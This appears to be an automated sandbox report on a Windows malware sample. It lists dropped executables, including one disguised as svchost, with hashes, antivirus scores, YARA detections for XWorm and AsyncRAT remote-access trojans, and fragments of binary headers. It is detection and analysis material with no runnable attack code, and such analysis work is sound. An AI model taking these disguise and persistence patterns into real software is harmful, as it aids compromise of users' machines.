                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                C:\Users\Public\DeadCodeRootKit.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):155136
                                                                                                                                                                                Entropy (8bit):7.794589901193739
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:9QpsyzjtpfkzW/7F/ix/ApwXnDLn10FbxYSC/B9KIZb29b/HvX:9QpsyzjtpfOW/7FO/AKL10FbmlBoIYRn
                                                                                                                                                                                MD5:B8479A23C22CF6FC456E197939284069
                                                                                                                                                                                SHA1:B2D98CC291F16192A46F363D007E012D45C63300
                                                                                                                                                                                SHA-256:18294EE5A6383A48D1BCF2703F17D815529DF3A17580E027C3EFEA1800900E8F
                                                                                                                                                                                SHA-512:786CD468CE3723516DC869B09E008EC5D35D1F0C1A61E70083A3BE15180866BE637BD7D8665C2F0218C56875A0EE597C277E088F77DD403BDD2182D06BAD3BD4
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                • Filename: mIURiU8n2P.exe, Detection: malicious, Browse
                                                                                                                                                                                Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$........{o..............q.......q..............o.......o...............o......Rich............PE..L......f.....................N............... ....@.......................................@.................................P9..x....@..8,...................p.......8..8............................................ ...............................text............................... ..`.rdata..@.... ......................@..@.rsrc...8,...@......................@..@.reloc.......p.......\..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\Public\DeadROOTkit.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):43520
                                                                                                                                                                                Entropy (8bit):5.571588653306265
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:8kQn3SBsJVCm+1pout8PKiFF+g9h7ey96FOChJ8gL7Zs6r:83dJYDLqvFn9wy96FOCsg7
                                                                                                                                                                                MD5:7DD98FC2976EE270A278E1A9A28EEFAE
                                                                                                                                                                                SHA1:0497EE045226B2D310C7678ED055EEEDBC88DC77
                                                                                                                                                                                SHA-256:5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
                                                                                                                                                                                SHA-512:94CAB0F684F79E7ADB6BEA43A909D9621A2EF6BF223FBF4650B040766E7EDFC95D77F62AA852EFCCB7752442E96182329934EEE58AD4B8F579A75BD8414D984C
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                • Filename: mIURiU8n2P.exe, Detection: malicious, Browse
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3..f................................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........^..x_............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                                                                C:\Users\Public\DeadXClient.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):35840
                                                                                                                                                                                Entropy (8bit):5.5592928582204815
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                                                                                                                                                MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                                                                                                                                                SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                                                                                                                                                SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                • Filename: mIURiU8n2P.exe, Detection: malicious, Browse
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........S...L............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                                                                C:\Users\Public\Deadsvchost.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\Public\DeadXClient.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):35840
                                                                                                                                                                                Entropy (8bit):5.5592928582204815
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                                                                                                                                                MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                                                                                                                                                SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                                                                                                                                                SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........S...L............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1.exe.log

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1.exe
                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1088
                                                                                                                                                                                Entropy (8bit):5.389928136181357
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/E
                                                                                                                                                                                MD5:6B2359BF987F4BDAF6CB014F63217859
                                                                                                                                                                                SHA1:3894B16E010FEFF2E71BEE0274746FC34C57C1DF
                                                                                                                                                                                SHA-256:ED763CED7BDAE1851B6A82D1D3685E9CC94937ADADD492DD2C1AC0AB639227FD
                                                                                                                                                                                SHA-512:C440BE0810F8CF29ADB6E816DA07A673C1E60E926926B2E863AFE7529C2D5EDB6118335C535CD0B4F0F7D7D6E5FE9801328A37FA4012F7D4B737F6F099A1489D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Deadsvchost.exe.log

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):654
                                                                                                                                                                                Entropy (8bit):5.380476433908377
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\aoKTzGQSRP.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512512
                                                                                                                                                                                Entropy (8bit):4.011952127732658
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:kU43i+9MrOq5q7pN37VvbvH3pJJtlueGAmp8R6LqSY4JiFZlmM5Ki634:V4JZDhAWS2ZN
                                                                                                                                                                                MD5:E1C82191B678CEA8F3C996887DDC1232
                                                                                                                                                                                SHA1:7946006CA278892817B7A778EEA1E04F5B2F948C
                                                                                                                                                                                SHA-256:BD00A7577088B67B52699F956275A3F563D623CA907FEEEAEE8D2F821D35DE40
                                                                                                                                                                                SHA-512:CB1499DB7C1A7B3C4436D02A1218A055F9C04D7B4AE2CA01FD179A6BDB74C30C8CDA1FFDA8B61DCC3397B97351B77D683295CB46701A614CF7341906BD807804
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..f................................. ........@.. .......................@............@.................................T...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......,!..(.............................................................(....*.r-..p.....r2..p.....~....~....(.........*...0..2........(.....(.....o.......+..........i].a...X....i2..*...0..L.......~....(.....r...p..(......(.....o........o....&....r...p..o....(....(....&..*.........0......BSJB............v4.0.30319......l.......#~..@.......#Strings....$...H...#US.l.......#GUID...|.......#Blob...........W.........%3............................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\aoKTzGQSRP.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):9629457
                                                                                                                                                                                Entropy (8bit):7.9880897173365195
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:196608:6aEILT2/mtStLjv+bhqNVobRUh8mUAneulFO+d:nNLTBtSVL+9qzGyuuld
                                                                                                                                                                                MD5:CC32561980C2400C490A4849C78E38ED
                                                                                                                                                                                SHA1:4652E5D3B0CCCD5A83F685672677F1E60A2BC07E
                                                                                                                                                                                SHA-256:6FF3F4971A2158C77969C28C2C574568E322931D40440DB60DFFDED695935AC5
                                                                                                                                                                                SHA-512:0D1D6D3187E6ECAFB8014B4C14F42158647CA575039EC4389226A1B7C6ABBD2E0186469DFD3774B0D92784346B8B288A0F3A9F1CB8BDE3FDC0DC756E5EA8412A
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.CU3.-.3.-.3.-.x...4.-.x.(...-.x.).9.-../..0.-../..:.-../).".-../(...-.x.,.4.-.3.,.I.-. ().*.-. (/.2.-.Rich3.-.........PE..d...U.}f.........."....(.....n...... ..........@.....................................}....`.................................................,...P.......4....`..."..............h... ...................................@............................................text............................... ..`.rdata...".......$..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...4...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dll

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):109392
                                                                                                                                                                                Entropy (8bit):6.641929675972235
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pyd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):49432
                                                                                                                                                                                Entropy (8bit):7.8135914033786475
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:25xdYKhY/Y5bQMskWu3IVCVJv7SyhJDxhy:OxdYKS/Y5RJRIVCVJvXpy
                                                                                                                                                                                MD5:F807854B836AB1E84FCDB11560216929
                                                                                                                                                                                SHA1:627EF83CA0611D9CB267C72DFCCF2F0A30297D7C
                                                                                                                                                                                SHA-256:5847649160F3F1564E26CBA88E70BD159CC5CEA08A1BF07ECD5B7796A49D259E
                                                                                                                                                                                SHA-512:85C28890F2FA4EA6D4F295D41FFC11109D217449CD6F77EA4A901D3F681C67F1ABF59FDC5DEAD503DB99BA766D1C51EE5505E456A3B605374B00E3FF832ADD1D
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d......e.........." ...#............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\_cffi_backend.cp311-win_amd64.pyd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):72704
                                                                                                                                                                                Entropy (8bit):7.910249809084461
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:mmtchbmUHui4ehi47gdUCK41d34AANP8zj6V:/uhKUHuwPMO9y10P83
                                                                                                                                                                                MD5:2443ECADDFE40EE5130539024324E7FC
                                                                                                                                                                                SHA1:EA74AAF7848DE0A078A1510C3430246708631108
                                                                                                                                                                                SHA-256:9A5892AC0CD00C44CD7744D60C9459F302D5984DDB395CAEA52E4D8FD9BCA2DA
                                                                                                                                                                                SHA-512:5896AF78CF208E1350CF2C31F913AA100098DD1CF4BAE77CD2A36EC7695015986EC9913DF8D2EBC9992F8F7D48BBA102647DC5EE7F776593AE7BE36F46BD5C93
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........ ..MA.CMA.CMA.CD9MCAA.C.4.BOA.C+.#CIA.C.4.BFA.C.4.BEA.C.4.BIA.C.9.BIA.C.=.BNA.CMA.C.A.C.4.BIA.CD9KCLA.C.4.BLA.C.4!CLA.C.4.BLA.CRichMA.C........................PE..d...,..e.........." ..... .......@...R...P................................................`..........................................s..l....p.......p..........<...........ht..$....................................^..8...........................................UPX0.....@..............................UPX1..... ...P......................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pyd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):59672
                                                                                                                                                                                Entropy (8bit):7.82957734909026
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:aAUOlRrHrPcX1nBeXfeIO/h8mLwj46IVLPZp7SyIx9:alOLL0FnIXm/yk6IVLPZpo
                                                                                                                                                                                MD5:955A3624921B140BF6ACABA5FCA4AC3B
                                                                                                                                                                                SHA1:027E0AF89A1DBF5EF235BD4293595BBC12639C28
                                                                                                                                                                                SHA-256:EA07594B2EEDE262D038DE13A64B76301EDFBDA11F885AFA581917B1FB969238
                                                                                                                                                                                SHA-512:B115E83061C11AAF0A0F1131A18BE5B520C5CBC3975F5B7A1E9CEA06B0AFF7A2815165FCD1F09BA1EFCF7C185E37E84A0B6AD4EEFEA3049A369BDF46ED3D2CB7
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................).....).....).....).....O...............W.......c.O.....O.....O.o...O.....Rich..........................PE..d......e.........." ...#.........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pyd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):109336
                                                                                                                                                                                Entropy (8bit):7.933037133644081
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:JOt51H+NnBZBmb1fZGlHc9ye/U65Qka1RkT1IJ5NrIecwgWN/xiNIVOqHC07SyiY:czanBZkGlmRc1en8R/iIVOqHC0r
                                                                                                                                                                                MD5:D967BEA935300A9DA0CD50BF5359A6EA
                                                                                                                                                                                SHA1:4C2FD9A31AABC90172D41979FB64385FDA79C028
                                                                                                                                                                                SHA-256:4B312A03C3A95BD301F095AB4201E2998A3C05E52FCD16C62AB1E51341F54AF2
                                                                                                                                                                                SHA-512:7BAA39A35BEAD863833EFD7519C761E8CD4E15B35825427CF654181534F41C9ABCDD85E017DAEB9AFEFE291D6C2741505BF7EEF30D4D25D53ADA82646857F356
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d......e.........." ...#.p...................................................0............`..........................................,..P....)....... ..........$'...........-..........................................@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pyd

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):36632
                                                                                                                                                                                Entropy (8bit):7.654026577022311
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:x35lZrQBDJLFSRN0cp71I6Pm9zje2pojcIVOI8a5YiSyvELAMxkE1R1:N5YbLkfzpIwm9zK1jcIVOI847SyMrxZz
                                                                                                                                                                                MD5:BEAC22863EE05D291190B6ABF45463C0
                                                                                                                                                                                SHA1:94CC19E31E550D7FD9743BBD74BFE0217CDDE7F9
                                                                                                                                                                                SHA-256:C1C3856EE8E86C8E5CF2B436C1426067F99A40C0DA4CBEA4E0B52582CD7B6B5B
                                                                                                                                                                                SHA-512:8AE651B912C0F9F2C431A4D3F1C769746F787BDD70CE53626106C903CB3F364CB1BAE7E6E2476868420ABD849A990C5604C533BC64B0EBA149F6BC36514A6F66
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(t..F'..F'..F'..'..F'u.G&..F'u.C&..F'u.B&..F'u.E&..F'..G&..F'..G&..F'..G'B.F'..K&..F'..F&..F'...'..F'..D&..F'Rich..F'................PE..d......e.........." ...#.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI48002\_lzma.pyd

                                                                                                                                                                                Download File
